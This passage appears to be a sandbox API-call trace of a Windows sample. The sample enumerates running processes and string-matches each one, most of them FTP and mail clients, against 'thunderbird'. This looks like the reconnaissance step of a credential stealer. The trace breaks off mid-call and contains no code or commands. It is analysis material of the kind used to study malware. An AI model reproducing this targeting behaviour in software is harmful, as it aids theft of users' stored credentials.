[0099.966] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="thunderbird") returned 0x0 [0099.966] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0099.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.967] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dc48 [0099.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357dc48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0099.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0099.967] StrStrIA (lpFirst="registered try.exe", lpSrch="thunderbird") returned 0x0 [0099.967] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0099.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.969] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c068 [0099.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356c068, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0099.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0099.969] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="thunderbird") returned 0x0 [0099.969] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0099.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.970] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c5d0 [0099.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x357c5d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0099.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0099.970] StrStrIA (lpFirst="invite.exe", lpSrch="thunderbird") returned 0x0 [0099.970] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0099.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.971] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c5e8 [0099.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x357c5e8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0099.971] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0099.971] StrStrIA (lpFirst="idol.exe", lpSrch="thunderbird") returned 0x0 [0099.971] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0099.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.972] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c090 [0099.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356c090, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0099.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0099.972] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="thunderbird") returned 0x0 [0099.972] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0099.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.973] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bfa0 [0099.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356bfa0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0099.973] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0099.975] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="thunderbird") returned 0x0 [0099.976] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0099.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.977] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c600 [0099.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x357c600, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0099.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0099.977] StrStrIA (lpFirst="powell_jane.exe", lpSrch="thunderbird") returned 0x0 [0099.977] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0099.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.978] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357da48 [0099.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357da48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0099.978] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0099.978] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="thunderbird") returned 0x0 [0099.978] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0099.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.979] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c618 [0099.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x357c618, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0099.979] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0099.979] StrStrIA (lpFirst="gainedshape.exe", lpSrch="thunderbird") returned 0x0 [0099.979] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0099.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.980] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357da88 [0099.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357da88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0099.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0099.980] StrStrIA (lpFirst="opens-versions.exe", lpSrch="thunderbird") returned 0x0 [0099.980] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0099.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.981] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356bfc8 [0099.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356bfc8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0099.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0099.981] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="thunderbird") returned 0x0 [0099.981] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.982] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357ca08 [0099.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x357ca08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0099.982] StrStrIA (lpFirst="3dftp.exe", lpSrch="thunderbird") returned 0x0 [0099.983] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.984] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dac8 [0099.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357dac8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0099.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0099.984] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="thunderbird") returned 0x0 [0099.984] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.985] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357cab0 [0099.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x357cab0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.985] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0099.985] StrStrIA (lpFirst="alftp.exe", lpSrch="thunderbird") returned 0x0 [0099.985] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.986] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c9f0 [0099.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x357c9f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0099.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0099.986] StrStrIA (lpFirst="barca.exe", lpSrch="thunderbird") returned 0x0 [0099.986] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.987] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357ca20 [0099.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x357ca20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0099.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0099.987] StrStrIA (lpFirst="bitkinex.exe", lpSrch="thunderbird") returned 0x0 [0099.987] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.988] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cb28 [0099.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x357cb28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0099.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0099.988] StrStrIA (lpFirst="coreftp.exe", lpSrch="thunderbird") returned 0x0 [0099.988] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0099.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.989] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574fb0 [0099.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574fb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0099.989] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0099.990] StrStrIA (lpFirst="far.exe", lpSrch="thunderbird") returned 0x0 [0099.990] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.991] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357cb40 [0099.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x357cb40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0099.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0099.991] StrStrIA (lpFirst="filezilla.exe", lpSrch="thunderbird") returned 0x0 [0099.991] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.992] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cb58 [0099.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x357cb58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0099.992] StrStrIA (lpFirst="flashfxp.exe", lpSrch="thunderbird") returned 0x0 [0099.992] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.993] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357cb10 [0099.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x357cb10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0099.993] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0099.993] StrStrIA (lpFirst="fling.exe", lpSrch="thunderbird") returned 0x0 [0099.993] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.994] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dae8 [0099.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357dae8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0099.994] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0099.995] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="thunderbird") returned 0x0 [0099.995] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.996] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357db48 [0099.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, 